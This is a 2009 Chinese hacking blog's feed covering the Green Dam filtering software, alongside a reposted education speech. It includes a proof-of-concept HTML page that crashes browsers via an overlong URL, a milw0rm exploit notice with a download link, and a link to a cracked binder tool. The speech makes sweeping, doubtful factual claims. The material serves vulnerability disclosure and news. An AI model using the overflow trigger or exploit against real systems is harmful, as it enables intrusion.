href="http://cid-16507ea1777422ae.skydrive.live.com/self.aspx/.Public/%e5%a3%b3%e5%ad%90%7C0%e6%8d%86%e7%bb%91%e5%99%a8/%e7%89%a7%e6%b0%91%e6%88%98%e5%a4%a9%e4%bc%9a%e5%91%98%e6%8d%86%e7%bb%91%e5%99%a8.rar">猛击此处下载源文件破解文件。</a><br /><span style="color:#ff0000;">版权声明:</span><br />转载请注明原作者:<span style="color:#ff0000;">☆obaby☆</span><br />网站名称:<a href="http://www.obaby.org.cn/"><span style="color:#3333ff;"><strong>☆Obaby's H4cking W0rld☆</strong></span></a><br /><a href="http://cam.taoke.alimama.com/event.php?pid=mm_10512996_0_0&eventid=100564" target="_blank"><img src='http://img.alimama.cn/topicfile/2009-05-06/10056409440602441117.gif'></a><br /><a href="http://cam.taoke.alimama.com/event.php?pid=mm_10512996_0_0&eventid=100561" target="_blank"><img src='http://img.alimama.cn/topicfile/2009-05-05/12414879269631.jpg'></a><br /><a href="http://cam.taoke.alimama.com/event.php?pid=mm_10512996_0_0&eventid=100324" target="_blank"><img src='http://img.alimama.cn/topicfile/2009-04-27/12408111274951.jpg'></a><br /></span>☆obaby☆http://www.blogger.com/profile/12833247715358659703noreply@blogger.com1tag:blogger.com,1999:blog-3777450046188403147.post-39854325291536098382009-06-14T09:39:00.000+08:002009-06-14T09:40:22.832+08:00郎咸平教授谈教育郎咸平教授:我非常喜欢你的问题,我从第三个开始回答。我教育子女是非常成功的。非常成功的,第一,我的大儿子,没念过本科,专科,我根本不在乎,我没有丝毫的愧疚,不好意思我儿子没有读过本科。我儿子是混世魔王,没有念过多少书,但是他这一生什么都不听我的,包括结婚都不听我的,我特别狠,但是他的前途规划他非常听我的。我拿我二儿子做比较,他比较笨,遗传他妈妈,念这个数学总是不灵光,我叫他念什么吗?我要他,他在美国长大的,英文就是美国人的英文,中文还可以,我要他去念你们想不到的两个语文,一个是韩文,一个是日文,你知道什么目的吗?我已经看准了,取代日本,成为经济强权的不是中国,而是韩国。现在学韩文和日文再加上英文和中文的背景,他一定会成为稀缺人才,这叫什么?差异化。但是也付出了惨痛的代价,他现在学了韩文一年,就认识了一个韩国女朋友,眼睛这么小,我们郎咸平教授遗传大眼睛,我看下一代就没了。 <br /> <br /> 我大儿子做什么的呢?他是做修理汽车的。就是改装汽车的。为什么做这个?也是跟我今天演讲有关想一想,在二元经济环境里面,企业找不到机会,炒楼炒股,你有没有想到为什么古董和普洱茶价格这么攀升?见到什么炒什么?时间越久,价格越高。我告诉我大儿子事情,你做汽车改装,要抓住这个潮流,很多人愿意买一部奥迪或者大众,再花20万,把内部零件和马达重新做改装,比如一个排气管改成四个排气管,换掉一些里面的配件,什么都看不出来,速度奇快,这就是掌握了虚拟资金的动向。大家会愿意花钱去买古董,普洱茶,也愿意花20万做汽车改装,你当时真正的理解了我今天的演讲,包括我对这个纺织朋友做的演讲,你回去思考一下,你如何教育子女,不要走传统的道路,我从来不让他们念数学。我自己数学好得不得了。我也从来不让他们念研究生,但我儿子说,他想念研究生的话,我一定痛骂他一顿,我的学历是最高的,但是我是例外,我的创造力没有被扼杀,我对这两个子女的教育,老大比较聪明,老二比较笨。老大可以在汽车改造上面发挥创造力,能够帮助你改装汽车,通过车检,笨的那一个就是走一条稳当的道路,差异化。差异化本身就是一门学问。你让他形成差异化,差异化不是去念研究生。理解我乐观意思吗?至于你讲的股市预测,你必须得原谅我,今天是公开场合,我不能讲,怎么走,我一讲的话,后果不堪设想。你要理解我,但是我可以给你很肯定的讲一句话,上我课的人,只要现场没有录影的,没有记者在场的,我都会讲,而且我从来没有讲错,这次我为什么到处讲课非常火爆的原因,只说这个楼价的原因,我对着记者照讲,我对楼价的批评,是谁,假如说没有拐点,谁说上海楼价一定涨?一定是我,是我理解了二元经济的本质,那么江浙两地的价格一定涨,这是我对二元经济的评判。 <br /><span class="fullpost"><br />郎咸平教授:我回答后面的问题,其实大家,我们的民营企业家,有一个很大的思想的误区,你总认为,家族控股是个问题,其实我告诉你,全世界的国家,除了美国,以及英国之外,基本上都是家族控股。包括加拿大、德国、法国都是的。而美国和英国,是例外。所以例外,是因为从1890年开始,美国政府,透过政府的力量,让大家族,退出了经济舞台,所以他们的公司才变成大众持股的公司。可是其他的国家没有这么做过。因此以全世界的格局而言,家族控股是正常的。在美国,之所以没有那么多的家族控股,是因为美国的政策,排挤大家族。如果家族控股是正常,你应该担忧什么呢?请问你们苏南的企业家,你担不担心富不过三代?你肯定担心。你因为担心,所以从小就让你的子女好好学习,弹钢琴,怎么怎么样,送出国念书,总希望他能够接下你的棒子,再请问你一句话,你觉得你做的对不对?我觉得这个题目啊,问题问的非常深远,我也想在这个时刻,和你们谈谈一些感性的问题,我可以清楚的告诉你,今天,中国的教育制度,它最大的问题在哪里?尤其我们企业家培养你的子女好好读书的时候,你要想一想教育制度的问题,不要傻傻的认为孩子读书是个必然,你要晓得,中国的教育体系,它基本上,是培养解题高手。而不是培养创造力。你们只要顺利的读完本科。你们在座的都读完本科没有?在座的?你们只要顺利的读完本科,就可以充分的证明你们是一群没有创造力的人,因为中国的教育制度培养的就是解题高手,这也是为什么合肥的中国科技大,他的少年班会失败,为什么失败呢?道理很明显,你在当年挑的高中、初中的学生都不是天才,是解题高手。那么你自己想一想,你有没有这种能力?把个解题高手拿过来经营你的企业,你能够成功吗?你想一想?未来的企业变化,包括我今天讲的产业链竞争,是何其的复杂?哪里是解题高手应付得了的呢?今天你让你的小孩高考,学钢琴,更可恨的是你逼你的小孩考奥林匹克竞赛,浪费他的生命,毁灭你的企业,这样他会变成一个好恶创造力的解题高手。那要问我了,送出国是不是好一点?我反问你,你送出国想学什么?你想学什么? <br /> <br /> 我今天想跟你做个证明,你想的都是错的。首先问你一句话,你是不是认为,中国人是最聪明的民族?有多少人是这么认为的?我过去不成熟的时候也这么认为的,尤其是我们的学生,到了美国之后,一念起书来,名列前茅,美国人笨笨的,不行。像我们考智力测验,美国人特笨。上次考一个智力测验,他说这个题目好难啊,3+X=2,X是几呢?想不出来,好笨,两个齿轮,这个这么转,另外一个怎么转呢?老美怎么都想不出来?这个这么转,另外一个怎么转呢?老中国就知道,这么转嘛,飞机这么一抖怎么飞?老美想不出来,老难啊,老中一下就知道了,往上飞嘛,老美说,哎呀,想不通啊。你知道吗?好笨啊,是这样子吗?我以前也这样认为老美的。我在20几岁的时候,告诉各位,中国的一流人才,基本上是念理工科,像我都是当初比较差的,才去念商科、经济,我在高中的时候,我如果稍微聪明一点的话,我也去念理工科去了,因为我的父母告诉我,学好数理化,走遍天下都不怕,你们有没有想到,这句话就是错的,胡说八道。你们想到的几乎都是错的,我跟你讲,为什么中国人到美国去,和美国人竞争,你这么优秀呢?我可以跟你讲,因为中国的一流人才是念理工科的,而美国的一流人才是不念理工科的,念什么?法,商,医,他们是三流人才才去念理工科,因此我们的一流人才碰到人家的三流人才,当然认为好聪明了。 <br /> <br /> 你连这个都不知道,你还敢把你的子女送出国来接替你的位置吗?我自己可以讲这句话,你看我聪明不聪明?我到了沃顿商学院,跑道我们班上的老美,真聪明这些人,到那个时候才发现自己怎么这么笨呢?我今天不讲法、商,美国总统都是拿的法学院出来的,美国的财政部长都是商学院出来的,我谈谈你们最熟悉的医学,我就谈医学的落后,你就知道,我们在其他方面的落后。一个排球巨星叫赵蕊蕊,脚经伤了,我们找了中国的骨科学家会诊,就是用保守疗法治疗之后,就可以出来打球了,结果一打球又断掉,当时姚明的经理找了一个美国的骨科医生在旁边监控,这位同志没有说话,只是不断的摇头叹气。为什么摇头叹气?因为中国的骨科水平是美国1935年的水平。这个医生最后在赵蕊蕊第二次断掉之后,美国人怎么治疗?美国人在膝盖打一个洞,用钛合金的骨头插到骨头里面去,一个礼拜就好了。我们的医生居然问了一句话,这么先进的技术,请问钛合金的骨头在那里买?怎么制造?我们美国的钛合金骨头都是从广州进口的。我哥哥在北京出了车祸,大腿骨骨折,这是我亲身经历,北京最好的骨科医院,从正面给你切开,这么多神经,骨头借好,在上面用钢钉打下去,治疗好之后我哥哥变成了一个瘸子,回到美国,当X光拍出来之后,这个医生立刻尖叫,哇,同志们,快过来看,这是中国骨科医生的水平,我们美国1935年的水平,这个医生从侧面把肌肉切开,把钉子拔开来,两个已经生锈了,把不锈钢拿出来,缝好肌肉,什么都不动,从屁股打一个洞,从广州进口的钛合金骨头,从屁股插进去,一个礼拜我哥哥就可以走路了,而且不再瘸了。我们香港的水平呢?我觉得,应该差美国15年,我们家人呢,毛病特多,有一个人,手腕摔断了,按照你们的想法,摔断了应该怎么样?接好,打上石膏,有没有反对的?你们就是这种水平。到现在还认为要打石膏,可见你们多落伍。我们香港是落后美国15年,是这么做的。 <br /> <br /> 骨科医生,拿出一张像皮肤颜色一样的纸,泡在热水里面5分钟之后,拿起来会这么软,然后就剪成一个手的形状包在一起,由于是一张纸张非常薄,包起来什么都看不出来,而且是肌肉的颜色,5分钟之后这张纸张就硬的像铁一样,紧抱着肌肉,袖子一卷什么都看不出来,不需要用石膏,因为用是国是1935年的技术,你知道吗?你们还认为是打石膏,可见你们的思想多么的不先进,多么僵化,就凭这个僵化的思想你想培养下一代,你连怎么培养都搞不清楚。你考奥林匹克竞赛,学钢琴,考高考,念了第一名之后,创造力完全丧失之后,到美国学理工科,学机械,制造,接你的企业,下场是什么?富不过三代,因为你自己的学问,跟你自己的理解,还不足以培养你的下一代。我今天这个话讲的比较难题了。所以跟你们讲,第一代的企业家,你的真正的危机在于思维的落后,就凭这种思维要培下一代,下一代,也很难有成就。就可以跟各位这么讲,从2008年之后的企业家,之所以能够成功,一定有非常国际接轨的视野,他才能成功。而且不是叫他学钢琴,考数学竞赛,不是,而是要理解什么才叫做真正的教育?我这么讲应该是非常深刻的,你们思考一下,家族企业不是问题,那只是表面现象,家族企业除了美英之外,全世界都是家族企业,人家为什么做的好?是他们理解了教育的本质,他们知道,如何培养下一代。好吗?你理解我今天这番话,回去之后,就不要再为家族企业烦恼,想一想,你这种水平,怎么培养下一代,告诉你。你连摔伤了,你连摔伤的时候,还停留在打石膏的水平,你怎么教育下一代?我告诉你,好吗?我可以跟各位讲,思维的创新,思维的开拓是这一代,家族企业,领袖的教育下一代的必胜法宝。 <br /> 主持人:我们看多常州地区的家族企业经过这么多年的发展壮大,当年的父子辈领导也开始寻找接班人了,今天郎咸平教授告诉我们,我们找接班人,一定要让他们知道什么是真正的教育,思维上的创新和开拓,才能够是我们富过三代的法宝。<br /><br /><span style="color:#ff0000;">版权声明:</span><br />转载请注明原作者:<span style="color:#ff0000;">☆obaby☆</span><br />网站名称:<a href="http://www.obaby.org.cn/"><span style="color:#3333ff;"><strong>☆Obaby's H4cking W0rld☆</strong></span></a><br /><a href="http://cam.taoke.alimama.com/event.php?pid=mm_10512996_0_0&eventid=100564" target="_blank"><img src='http://img.alimama.cn/topicfile/2009-05-06/10056409440602441117.gif'></a><br /><a href="http://cam.taoke.alimama.com/event.php?pid=mm_10512996_0_0&eventid=100561" target="_blank"><img src='http://img.alimama.cn/topicfile/2009-05-05/12414879269631.jpg'></a><br /><a href="http://cam.taoke.alimama.com/event.php?pid=mm_10512996_0_0&eventid=100324" target="_blank"><img src='http://img.alimama.cn/topicfile/2009-04-27/12408111274951.jpg'></a><br /></span>☆obaby☆http://www.blogger.com/profile/12833247715358659703noreply@blogger.com1tag:blogger.com,1999:blog-3777450046188403147.post-27886742890386408402009-06-14T09:36:00.001+08:002009-06-14T09:39:29.829+08:00China's Filtering Software Contains Pirated CodeThe "Green Dam" filtering software that the Chinese government is reportedly requiring for all PCs sold there contains pirated code, a U.S. software manufacturer claimed Friday. <br /><br /><br /><a href="http://www.pcmag.com/topic/0,2944,t=Solid%20Oak%20Software%20Inc&s=1489,00.asp">Solid Oak Software</a>, the developer of CyberSitter, claims that the look and feel of the GUI used by Green Dam mimics the style of CyberSitter. But more damning, chief executive Brian Milburn said, was the fact that the Green Dam code uses DLLs identified with the CyberSitter name, and even makes calls back to Solid Oak's servers for updates. <br /><br />Green Dam is a piece of filtering software that will reportedly be required for all PCs sold inside China. <a href="http://www.lssw365.net/index.php/List/index/pid/2">The software is already available in China</a>, although the restrictions go into place on July 1, according to <a href="http://www.nytimes.com/2009/06/09/world/asia/09china.html">The New York Times</a>. <br /><br /><a href="http://www.cse.umich.edu/~jhalderm/pub/gd/">According to a study by the University of Michigan</a>, the Green Dam software works to identify images, text, and URLs and compares them to a filter, which blocks the offending work. The researchers took the publicly available software and reverse-engineered it, using standard methods. Inside, the study's author, assistant professor of electrical engineering J. Alex Halderman, found evidence that the software uses blacklists compiled by CyberSitter, dating back to 2006. An encrypted news bulletin, which dates back to 2004, was also accidentally included, Halderman wrote. <br /><br />"We've been talking with them since the report came out yesterday," Halderman said in an interview. <br /><span class="fullpost"><br />To Halderman, the Green Dam software presents two fundamental problems: one, that the software contains vulnerabilities that would allow others to spy on the activities of those who use it; and second, that it might contain code stolen from another manufacturer. The Chinese developer of the Green Dam software appears to have accidentally created the vulnerabilities, Halderman said, rather than being a deliberate attempt to allow government agencies to monitor its citizens online. <br /><br />"If we apply reasoning to this, we would conclude that the government wants a backdoor it could access, and others could not," Halderman said. <br /><br />Version 3.17 of the Green Dam software appears to contain both the references to the blacklists as well as the allegedly stolen code. But the software is also being frequently updated, and the most recent patch, applied Thursday, appears to eliminate many of the blacklist references to Solid Oak, Halderman said. <br /><br />"I think the bottom line is that the Chinese government is trying to roll out the software without doing their due diligence," Halderman said. "Clearly, there needs to be more time to evaluate the software both in terms of legality and in terms of security before it is rolled out on a widespread basis." <br /><br />That was small consolation to Solid Oak's Milburn, who said that he had received an anonymous email sent to a broadcast address at the site Friday morning alerting the company that Green Dam was using Solid Oak code. He dismissed it, thinking it was a hoax. But another employee researched it and found that the allegation was indeed true, and that both URLs and other Solid Oak code, including DLL files, were part of Green Dam. After doing a bit of research he found the U. of Michigan paper and contacted Halderman. <br /><br />"From the stuff they've posted, I'm 100 percent certain they're using our proprietary code," Milburn said, who said he wasn't certain how much of the code was reverse-engineered or simply stolen. <br /><br />"We're still trying to do the detective work here," Milburn said. <br /><br />At press time, Solid Oak had determined that the filtering engine or parts of it on lower level had been decompiled, using certain proprietary methods. Solid Oak doesn't ship a Chinese-language version of CyberSitter. But, Milburn said, "the words a user sees on the screen are almost identical to ours." <br /><br />According to Milburn, the company spent Friday trying to determine what its options were, and what avenues it could pursue to try and prevent its code from being misused. <br /><br />According to The New York Times, PC OEMs were blindsided by the Green Dam requirement, and have tried to figure out how they could add the software to their production lines just six weeks before the mandate was scheduled to take place. Dell, Hewlett-Packard, and other OEMs would be required to add the software to their PC distributions. <br /><br />But would they if it contributed to software piracy? "To my mind, [shipping Green Dam] would make the PC manufacturers an accessory after the fact to software piracy," Milburn said. "I would think that the PC manufacturers wouldn't want to do that if I were in their position." <br /><br />"We haven't had any opportunity to explore our options," Milburn said. "At the very minimum, I believe we would pursue some sort of injunction." <br /><br />Theoretically, this could place PC OEMs wishing to do business in China with a nearly impossible choice: face the threat of an injunction or suits within the United States, risk angering the Chinese government by removing the Green Dam software, or halt PC sales into China altogether. Representatives at Hewlett-Packard and Dell were unable to be reached for comment by press time. <br /><br />This isn't the first time Solid Oak's code has been stolen, Milburn said. In the late 1990s, hackers reverse-engineered CyberSitter, which prevents underage children from accessing pornography or other adult content, to allow users to access such content. <br /><br />The hackers, as well as other detractors, have previously accused Solid Oak and CyberSitter of censoring the Internet. "That's why we don't want to be associated with it," Milburn said of Green Dam. <br /><br />Moreover, potentially millions of Chinese PC users could hit Solid Oak's servers for updates, causing them huge fees for the additional bandwidth costs the company would be charged for. <br /><br />One obvious solution to the problem would be to block access to China, a move that would also cut off a number of American schools in China, including missionary schools, that use the software as a legitimate means of preventing children from accessing the adult content. Some organizations with satellite offices in Singapore, Korea, or other South Asian countries might also be affected. <br /><br />"They're using it legitimately, and we don't want to turn off the entire continent," Milburn said. <br /><br /><br /><a href="http://www.pcmag.com/article2/0,2817,2348705,00.asp">http://www.pcmag.com/article2/0,2817,2348705,00.asp</a><br /><br /><br /><span style="color:#ff0000;">版权声明:</span><br />转载请注明原作者:<span style="color:#ff0000;">☆obaby☆</span><br />网站名称:<a href="http://www.obaby.org.cn/"><span style="color:#3333ff;"><strong>☆Obaby's H4cking W0rld☆</strong></span></a><br /><a href="http://cam.taoke.alimama.com/event.php?pid=mm_10512996_0_0&eventid=100564" target="_blank"><img src='http://img.alimama.cn/topicfile/2009-05-06/10056409440602441117.gif'></a><br /><a href="http://cam.taoke.alimama.com/event.php?pid=mm_10512996_0_0&eventid=100561" target="_blank"><img src='http://img.alimama.cn/topicfile/2009-05-05/12414879269631.jpg'></a><br /><a href="http://cam.taoke.alimama.com/event.php?pid=mm_10512996_0_0&eventid=100324" target="_blank"><img src='http://img.alimama.cn/topicfile/2009-04-27/12408111274951.jpg'></a><br /></span>☆obaby☆http://www.blogger.com/profile/12833247715358659703noreply@blogger.com1tag:blogger.com,1999:blog-3777450046188403147.post-75866052953623672732009-06-13T09:50:00.000+08:002009-06-13T09:51:46.320+08:00Green Dam remote buffer overflow exploit"Green Dam" is a software used for monitoring and anti-pornography, popularizing by<br />Chinese goverment. After July 1st, it will be forced to install on all new Chinese PCs.<br />Now it already has 50 million copies in China.<br />In order to monitor the URL that user is exploring, Green Dam injected the browser<br />process. When Green Dam is trying to handle a long URL, a stack overflow will occur in the<br />browser process.<br />This exploit can be used for exploitation on IE, on those computers installed Green Dam.<br />I used the .net binary to deploy shellcode, for it`s more stable than Heap Spray, and able<br />to bypass DEP and ASLR on Vista.<br />The exploit page contains a .net control, so it should be published on IIS.<br /> ---seer[N.N.U]<br /><br /><a href="http://milw0rm.com/sploits/2009-green-dam.zip">http://milw0rm.com/sploits/2009-green-dam.zip<br /></a><br /># milw0rm.com [2009-06-12]<br /><span class="fullpost"><br /><span style="color:#ff0000;">版权声明:</span><br />转载请注明原作者:<span style="color:#ff0000;">☆obaby☆</span><br />网站名称:<a href="http://www.obaby.org.cn/"><span style="color:#3333ff;"><strong>☆Obaby's H4cking W0rld☆</strong></span></a><br /><a href="http://cam.taoke.alimama.com/event.php?pid=mm_10512996_0_0&eventid=100564" target="_blank"><img src='http://img.alimama.cn/topicfile/2009-05-06/10056409440602441117.gif'></a><br /><a href="http://cam.taoke.alimama.com/event.php?pid=mm_10512996_0_0&eventid=100561" target="_blank"><img src='http://img.alimama.cn/topicfile/2009-05-05/12414879269631.jpg'></a><br /><a href="http://cam.taoke.alimama.com/event.php?pid=mm_10512996_0_0&eventid=100324" target="_blank"><img src='http://img.alimama.cn/topicfile/2009-04-27/12408111274951.jpg'></a><br /></span>☆obaby☆http://www.blogger.com/profile/12833247715358659703noreply@blogger.com1tag:blogger.com,1999:blog-3777450046188403147.post-75063975336077132902009-06-12T18:00:00.001+08:002009-06-12T18:03:37.242+08:00绿坝被老外爆严重安全问题绿坝被老外爆严重安全问题,根据下面链接的描述,安装绿坝后只需要访问一个特定的URL就会被溢出执行恶意代码。<br /><br /><a href="http://www.cse.umich.edu/~jhalderm/pub/gd/">http://www.cse.umich.edu/~jhalderm/pub/gd/</a><br /><br />PS:<br /><br />被和谐的POC代码<br /><br />--------我是和谐分割线---------------------------------------------------------------------<br /><code><br /><html><br /><head><br /><title>Green Dam Vulnerability Demonstration</title><br /></head><br /><body><br /><p>If you're running Green Dam, clicking this button should crash your browser or tab.</p><br /><p>See our <a href="http://www.cse.umich.edu/~jhalderm/pub/gd/">report</a> for details about Green Dam security vulnerabilities.</p><br /><center><br /><input style="font-size:120%;" type="button" name="demo1" value="Crash Browser!" onclick="javascript:window.location='http://wolchok.org:8000/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.html'"></input><br /></form></center><br /></body><br /></code><br /><span style="color:#ff0000;">版权声明:</span><br />转载请注明原作者:<span style="color:#ff0000;">☆obaby☆</span><br />网站名称:<a href="http://www.obaby.org.cn/"><span style="color:#3333ff;"><strong>☆Obaby's H4cking W0rld☆</strong></span></a><br /><a href="http://cam.taoke.alimama.com/event.php?pid=mm_10512996_0_0&eventid=100564" target="_blank"><img src='http://img.alimama.cn/topicfile/2009-05-06/10056409440602441117.gif'></a><br /><a href="http://cam.taoke.alimama.com/event.php?pid=mm_10512996_0_0&eventid=100561" target="_blank"><img src='http://img.alimama.cn/topicfile/2009-05-05/12414879269631.jpg'></a><br /><a href="http://cam.taoke.alimama.com/event.php?pid=mm_10512996_0_0&eventid=100324" target="_blank"><img src='http://img.alimama.cn/topicfile/2009-04-27/12408111274951.jpg'></a>☆obaby☆http://www.blogger.com/profile/12833247715358659703noreply@blogger.com1tag:blogger.com,1999:blog-3777450046188403147.post-50740158286946942232009-06-12T09:00:00.000+08:002009-06-12T09:01:10.492+08:00工信部过滤软件 “杀错良民”闹笑话(联合早报网讯)香港明报报道,中国工业和信息化部强制推行的“绿坝-花季护航”过滤软件,在实际应用中曾闹过不少荒唐的笑话,引起学者和网民质疑。着名学者、《北大商业评论》副主编胡泳指出,若图片背景是黄色为主,黑色为辅,就有可能被“绿坝”判为色情图片;学校老师所出的数学题里因为有玩球和摸球的字样,就被软件所屏蔽掉。 <br /><br /> 在科技中国网站上,有专长资讯科技的网友罗列绿坝软件执行观察,指软件屏蔽的不良信息包括时政类信息,其判断没有任何提示,“同性恋”亦被视为不良信息。软件对微软的互联网浏览器(IE)较有效,但对“火狐”(Firefox)则无法监控。假如新华社网站刊载了人体艺术图片,整个新华网将被屏蔽及列入黑名单,网址列入黑名单并无确认,软件自身保护功能不强,并可被文件粉碎机绞碎。<br /><span class="fullpost"><br /><span style="color:#ff0000;">版权声明:</span><br />转载请注明原作者:<span style="color:#ff0000;">☆obaby☆</span><br />网站名称:<a href="http://www.obaby.org.cn/"><span style="color:#3333ff;"><strong>☆Obaby's H4cking W0rld☆</strong></span></a><br /><a href="http://cam.taoke.alimama.com/event.php?pid=mm_10512996_0_0&eventid=100564" target="_blank"><img src='http://img.alimama.cn/topicfile/2009-05-06/10056409440602441117.gif'></a><br /><a href="http://cam.taoke.alimama.com/event.php?pid=mm_10512996_0_0&eventid=100561" target="_blank"><img src='http://img.alimama.cn/topicfile/2009-05-05/12414879269631.jpg'></a><br /><a href="http://cam.taoke.alimama.com/event.php?pid=mm_10512996_0_0&eventid=100324" target="_blank"><img src='http://img.alimama.cn/topicfile/2009-04-27/12408111274951.jpg'></a><br /></span>☆obaby☆http://www.blogger.com/profile/12833247715358659703noreply@blogger.com1tag:blogger.com,1999:blog-3777450046188403147.post-60028649875366091512009-06-11T13:04:00.002+08:002009-06-11T13:11:33.781+08:00绿坝-花季护航软件技术分析 A Technical Analysis of the 'Green Dam-Youth Escort' Software声明:本文为转载版权归原作者所有。<br />原文地址:<a href="https://docs.google.com/View?id=afk7vnz54wt_12f8jzj9gw">https://docs.google.com/View?id=afk7vnz54wt_12f8jzj9gw</a><br /><br />绿坝-花季护航软件技术分析<br />A Technical Analysis of the 'Green Dam-Youth Escort' Software<br /><br />协作组编写 A collaborative work<br />2009年6月 June, 2009<br /><br />关于 About<br /><br />绿坝-花季护航是金惠堵截黄色图像和不良信息专家系统的市场产品名。<br />Green Dam is the informal name given to the expert system from Jinhui Technologies which blocks pornographic images and other harmful information.<br /><br />金惠堵截黄色图像和不良信息专家系统 V2.51<br />项目总监 赵慧琴 Project Director: Zhao Huiqin<br />技术总监 周翚 Technical Director: Zhou Hui<br />总设计师 汤怀礼 Chief Designer: Tang Huaili<br />策划经理 何红杰 Project Manager: He Hongjie<br />项目工程师 李弼程 ,曹闻 ,彭天强 ,钟声 Project Engineers: Li Bicheng, Cao Wen, Peng Tianqiang, Zhong Sheng, Li Xiaohe, Li Yang, Zhang Wenzhong<br /> 李晓贺 ,李扬 ,李书进黄亮 ,张文中<br />测 试 Mary 马, Sharon 张, 董娟 Beta Testers: Mary Ma, Sharon Zhang, Dong Juan<br />文 档 张晨民,刘裕 ,Biddle 张 Documentation: Zhang Chenmin, Liu Yu, Biddle Zhang<br />系统支持 吴朝阳, 宜娟 ,刘移山 ,丁敏 Systems Support: Wu Chaoyang, Xuan Juan, Liu Yishan, Ding Min<br />金惠科技 版权 (c) 2005 所有权利保留 Http://www.zzjinhui.com ©2009 Jinhui Technologies. All Rights Reserved<br /><span class="fullpost"><br />1)国家公安部信息安全专用产品销售许可证(XKC30492)National Ministry of Public Safety Information Security Product Sales License No. XKC30492<br />2)国家发展和改革委员会批准(发改高技[2004]2040号)列入“重大软件产业化专项”,是全国同类过滤产品唯一批准项目 National Development and Reform Commission Approval (NDRC Circular[2004]#2040) as "Major Software Industrialization Project", the only approved filtering software project of its kind nationwide<br />3)国家科技部(国科发技字[2004]449号)批准为“技术创新基金项目” Ministry of Science and Technology (MOST Circular[2004]#449) Approval for "technological innovation project funding"<br />4)国家信息产业部(信部运[2005]9号)批准为“电子信息产业发展基金项目” Ministry of Industry and Information Technology (MIIT Circular[2005]#9) Approval for "electronic information industry development project funding"<br />国家互联网违法和不良信息举报中心(net.china.cn)唯一正式推荐 Only the China Internet Illegal Information Reporting Center (ciirc.china.cn) has officially recommended Green Dam.<br />第九届中国国际软件博览会荣获金奖 Awarded first prize at the Ninth Chinese International Software Expo<br />2005中国郑州先进适用技术交易会金奖 First prize at the 2005 Zhengzhou Advanced Adaptive Technology Trade Fair<br />郑州市科技进步一等奖 First prize in technological advancement from Zhengzhou City<br />金惠公司营销服务中心电话:0371-63697160,63697161 Jinhui Marketing Service Center: 0371-63697160<br />传真:0371-63697171 Fax: 0371-63697171<br /><br />目的和功能 Objectives and functions<br />以工信部,教育部,财政部和国务院新闻办为<a href="http://www.lssw365.net/lvhang/index.php/Content/index/pid/1/sort/3/id/512">合作伙伴</a>,绿坝目前有<a 